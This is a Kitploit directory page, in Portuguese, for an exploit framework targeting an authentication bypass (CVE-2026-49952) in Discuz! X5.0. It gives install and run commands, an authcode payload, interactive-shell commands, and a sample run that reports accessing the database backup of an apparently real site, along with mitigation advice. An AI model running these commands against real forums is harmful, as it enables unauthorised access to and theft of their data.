Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Discuz-X5.0-Authentication-Bypass-Exploit-Framework — Discuz! X5.0 Framework de Exploração de Bypass de Autenticação (CVE-2026-49952) - Vulnerabilidade crítica que permite acesso não autenticado a backups de banco de dados por meio da reutilização de token do oráculo de criptografia UC_KEY. CVSS 9.1. Ferramenta completa com detecção de versão, ataques com múltiplos payloads, shell interativo e exploração automatizada. Somente para testes autorizados. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework
Autenticação e AutorizaçãoFrameworks de ExploraçãoAnálise de VulnerabilidadesExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoSegurança de Banco de Dados
GitHub

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework

Discuz-X5.0-Authentication-Bypass-Exploit-Framework

Ver Repositório
12há 1 mêsAinda não revisado

Sobre

Discuz! X5.0 Framework de Exploração de Bypass de Autenticação (CVE-2026-49952) - Vulnerabilidade crítica que permite acesso não autenticado a backups de banco de dados por meio da reutilização de token do oráculo de criptografia UC_KEY. CVSS 9.1. Ferramenta completa com detecção de versão, ataques com múltiplos payloads, shell interativo e exploração automatizada. Somente para testes autorizados.

Compartilhar

Discuz! X5.0 Framework de Exploração de Bypass de Autenticação

Security CVE CVSS Python License Version

⚡ CVE-2026-49952 | CVSS 9.1 (Crítica) | Versão 1.0.0

Uma ferramenta profissional de teste de penetração projetada para identificar e demonstrar a vulnerabilidade crítica de bypass de autenticação no Discuz! X5.0.

D1

📋 Índice

  • ⚠️ Aviso Legal

  • 🔍 Visão Geral

  • 🎯 Detalhes da Vulnerabilidade

  • ✨ Recursos

  • 📦 Instalação

  • 🚀 Início Rápido

  • 💻 Exemplos de Uso

  • 🖥️ Shell Interativo

  • 🛡️ Considerações de Segurança

  • 🔧 Solução de Problemas

  • 📄 Licença


⚠️ Aviso Legal

AVISO IMPORTANTE Esta ferramenta é fornecida apenas para fins educacionais e testes de segurança autorizados. NÃO use esta ferramenta em sistemas que você não possui ou para os quais não possui permissão explícita para testar. O acesso não autorizado a sistemas de computador é ilegal e antiético. O autor não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado por esta ferramenta. Ao usar esta ferramenta, você concorda em cumprir todas as leis e regulamentos aplicáveis.


🔍 Visão Geral

O Discuz! X5.0 Framework de Exploração de Bypass de Autenticação foi projetado para identificar e demonstrar a vulnerabilidade crítica de bypass de autenticação (CVE-2026-49952) nas versões do Discuz! X5.0 lançadas entre 20 de março de 2026 e 1º de maio de 2026.

Esta vulnerabilidade permite que atacantes não autenticados acessem a funcionalidade de backup de banco de dados (dbbak.php) explorando o oráculo de criptografia UC_KEY para reutilização de tokens, potencialmente expondo conteúdos sensíveis do banco de dados.

Principais Destaques

  • 🏆 Pontuação CVSS: 9.1 (Crítica)

  • 🔐 Impacto: Bypass de Autenticação

  • 📂 Acesso: Arquivos de Backup do Banco de Dados

  • ⚡ Complexidade: Baixa (Fácil de Explorar)

  • 🎯 Alvo: Discuz! X5.0 (20260320 - 20260501)


🎯 Detalhes da Vulnerabilidade

Resumo Técnico

Causa Raiz

A vulnerabilidade existe no endpoint dbbak.php, onde o mecanismo de validação de token depende do oráculo de criptografia UC_KEY. Ao criar um payload específico na solicitação de login (member.php), um atacante pode obter um token de autenticação válido que pode ser reutilizado para acessar a funcionalidade de backup do banco de dados sem a devida autorização.

Versões Afetadas

  • ❌ Discuz! X5.0 (20260320 - 20260501) - Vulnerável

  • ✅ Discuz! X5.0 (20260510+) - Corrigido


✨ Recursos

Recursos Principais

  • 🔍 Detecção de Versão: Identificação automática de fingerprint e da versão do Discuz!.

  • ⚡ Ataque Multi-Payload: Teste paralelo de múltiplas variantes de payload.

  • 🖥️ Shell Interativo: Interface de linha de comando completa para exploração manual.

  • 🚀 Exploração Automatizada: Exploração com um clique e configuração mínima.

  • 📊 Salvamento de Resultados: Exporta os resultados de exploração para arquivos com timestamp.

  • 🌐 Suporte a Proxy: Configuração de proxy HTTP/HTTPS para tráfego de rede.

  • 🎯 Varredura com Threads: Número configurável de threads para otimização de desempenho.

  • 🎨 Saída Colorida: Saída de terminal com código de cores profissional.

Recursos Avançados

  • 🔐 Suporte SSL/TLS: Lida com alvos HTTP e HTTPS.

  • 🔄 Gerenciamento de Sessão: Mantém o estado de sessão persistente.

  • 📦 Personalização de Payload: Suporte para injeção de payload personalizado.

  • 🎯 Validação de Alvo: Verifica a instalação do Discuz! antes da exploração.


📦 Instalação

Pré-requisitos

  • Python: Versão 3.7 ou superior

  • Pip: Gerenciador de pacotes do Python

Instalar a partir do código-fonte

root@kitploit:~
# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework

# Install required packages
pip install -r requirements.txt

# Verify installation
python3 exploit.py --help

Instalar com Docker

root@kitploit:~
# Build the Docker image
docker build -t exploit .

# Run the container
docker run -it --rm exploit http://target.com

🚀 Início Rápido

Uso Básico

root@kitploit:~
# Simple exploitation
python3 exploit.py http://target.com

# With output file
python3 exploit.py http://target.com --output results.txt

# Verbose mode for debugging
python3 exploit.py http://target.com --verbose

Uso Avançado

root@kitploit:~
# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10

# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"

💻 Exemplos de Uso

Exemplo 1: Exploração Básica

root@kitploit:~
python3 exploit.py http://discuz.eda.com.my
📤 Saída Esperada
root@kitploit:~
██████╗ ██╗███████╗██╗   ██╗███████╗███████╗██████╗ 
██╔══██╗██║██╔════╝██║   ██║╚══███╔╝╚══███╔╝╚════██╗
██║  ██║██║███████╗██║   ██║  ███╔╝  ███╔╝  █████╔╝
██║  ██║██║╚════██║██║   ██║ ███╔╝  ███╔╝  ██╔═══╝ 
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝

Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt

╔══════════════════════════════════════════════════════════╗
║  EXPLOIT SUCCESSFUL                                      ║
╠══════════════════════════════════════════════════════════╣
║  Target: http://discuz.eda.com.my                        ║
║  Authcode: aBcDeFgHiJkLmNoPqRsT...                       ║
║  Status: Database backup accessed                        ║
║  Data Size: 24567 bytes                                  ║
║  Saved to: discuz_exploit_20260724_143218.txt            ║
╚══════════════════════════════════════════════════════════╝

🖥️ Shell Interativo

Inicie o shell interativo para exploração manual:

root@kitploit:~
python3 discuz_exploit.py http://target.com --interactive

Comandos Disponíveis


🛡️ Considerações de Segurança

✅ O Que Fazer

  • Use apenas em sistemas que você possui ou para os quais tem permissão explícita para testar.

  • Obtenha autorização por escrito antes de testar.

  • Siga práticas de divulgação responsável.

  • Reporte vulnerabilidades aos fornecedores adequadamente.

  • Use em ambientes de laboratório isolados para aprendizado.

❌ O Que Não Fazer

  • Nunca use contra sistemas de produção sem autorização.

  • Não compartilhe dados explorados publicamente.

  • Nunca use para atividades ilegais ou roubo de dados.

  • Não modifique ou exclua dados durante os testes.

  • Nunca explore sem consentimento.

Recomendações de Mitigação

Para administradores de sistemas:

  1. Atualize Imediatamente: Atualize para o Discuz! X5.0 (20260510+) ou superior.

  2. Desative o Endpoint: Desative temporariamente o dbbak.php se não for necessário.

  3. Monitore os Logs: Fique atento a acessos suspeitos a member.php e dbbak.php.

  4. Regras de WAF: Implemente regras de Web Application Firewall para bloquear solicitações maliciosas.

  5. Lista de IPs Permitidos: Restrinja o acesso ao endpoint de backup a IPs confiáveis.


🔧 Solução de Problemas

❌ Erros de Conexão
root@kitploit:~
Error: Failed to connect to target

Solutions:
• Check if target URL is correct
• Verify network connectivity
• Check for firewalls blocking access
• Try with proxy: --proxy http://your_proxy:port
• Ensure target is online and accessible
🚫 Falha na Autenticação
root@kitploit:~
Error: Authentication failed or invalid authcode

Solutions:
• Ensure the target Discuz! version is vulnerable
• Try different payloads for authcode extraction
• Check for network issues or WAF interference
• Run in verbose mode (--verbose ) for more details

📄 Licença

Este projeto está licenciado sob a Licença MIT.

Copyright © 2026 Sudeepa Wanigarathna

É concedida permissão, gratuitamente, a qualquer pessoa que obtenha uma cópia deste software e dos arquivos de documentação associados (o "Software"), para lidar com o Software sem restrições, incluindo, sem limitação, os direitos de usar, copiar, modificar, mesclar, publicar, distribuir, sublicenciar e/ou vender cópias do Software, e permitir que as pessoas às quais o Software é fornecido façam o mesmo, sujeito às seguintes condições:

O aviso de direitos autorais acima e este aviso de permissão devem ser incluídos em todas as cópias ou partes substanciais do Software.

O SOFTWARE É FORNECIDO "NO ESTADO EM QUE SE ENCONTRA", SEM GARANTIA DE QUALQUER TIPO, EXPRESSA OU IMPLÍCITA, INCLUINDO, MAS NÃO SE LIMITANDO ÀS GARANTIAS DE COMERCIALIZAÇÃO, ADEQUAÇÃO A UM DETERMINADO FIM E NÃO VIOLAÇÃO. EM NENHUM CASO OS AUTORES OU DETENTORES DOS DIREITOS AUTORAIS SERÃO RESPONSÁVEIS POR QUALQUER RECLAMAÇÃO, DANOS OU OUTRA RESPONSABILIDADE, SEJA EM AÇÃO DE CONTRATO, ATO ILÍCITO OU DE OUTRA FORMA, DECORRENTE DE, OU EM CONEXÃO COM O SOFTWARE OU O USO OU OUTRAS NEGOCIAÇÕES NO SOFTWARE.


Autor: Sudeepa Wanigarathna | GitHub: @CerberusMrXi

⭐ Se você achar esta ferramenta útil, considere dar uma estrela!

🔐 Use com responsabilidade. Mantenha-se ético. Continue aprendendo.

Baixar ferramenta
AtributoDetalhes
Tipo de VulnerabilidadeBypass de Autenticação
ID do CVECVE-2026-49952
Versão do CVSS3.1
Pontuação CVSS9.1 (Crítica)
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNenhuma
Impacto na ConfidencialidadeAlto
Impacto na IntegridadeAlto
Impacto na DisponibilidadeAlto
Maturidade do Código de ExploitFuncional
Nível de RemediaçãoCorreção Oficial Disponível
ComandoDescriçãoExemplo
helpMostra todos os comandos disponíveishelp
scanDetecta a versão do Discuz! e verifica a vulnerabilidadescan
get [payload]Extrai o authcode (payload personalizado opcional)`get admin
exploit [op]Executa o exploit (padrão: backup)exploit backup
saveSalva os resultados em arquivosave
infoExibe informações da sessãoinfo
clearLimpa a tela do terminalclear
exit / quitSai do shell interativoexit